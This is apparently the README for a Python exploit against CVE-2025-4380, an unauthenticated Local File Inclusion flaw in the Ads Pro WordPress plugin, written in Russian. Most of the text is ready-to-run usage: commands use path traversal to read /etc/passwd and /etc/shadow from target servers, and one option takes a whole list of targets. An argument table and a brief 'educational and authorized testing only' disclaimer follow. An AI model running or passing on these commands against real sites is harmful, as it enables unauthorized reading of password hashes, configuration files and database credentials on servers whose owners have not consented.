
Этот Python-эксплойт нацелен на плагин Ads Pro ≤ 4.89 для WordPress, уязвимый к Local File Inclusion (LFI) через AJAX-действие bsa_preview_callback.
Неаутентифицированный злоумышленник может использовать эту уязвимость для чтения произвольных файлов из файловой системы сервера, включая такие чувствительные файлы, как /etc/passwd, wp-config.php и другие.
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd
python3 cve_2025_4380.py -l targets.txt -p ../../../../etc/shadow
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd -o output.txt
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd --proxy http://127.0.0.1:8080
Запрос/ответ Burpsuite
CVE-2025-4380
Плагин Ads Pro <= 4.89 - Local File Inclusion через bsa_template в bsa_preview_callback
Этот эксплойт предоставлен только в образовательных целях и для авторизованного тестирования безопасности.
| Аргумент | Описание | Обязателен |
|---|
-u, --url | URL цели (например, http://target.com) | Нет |
-l, --list | Файл со списком URL целей | Нет |
-p, --path | Путь к файлу для включения (например, ../../etc/passwd) | Да |
-o, --output | Файл для сохранения результатов | Нет |
--proxy | Прокси (например, http://127.0.0.1:8080) | Нет |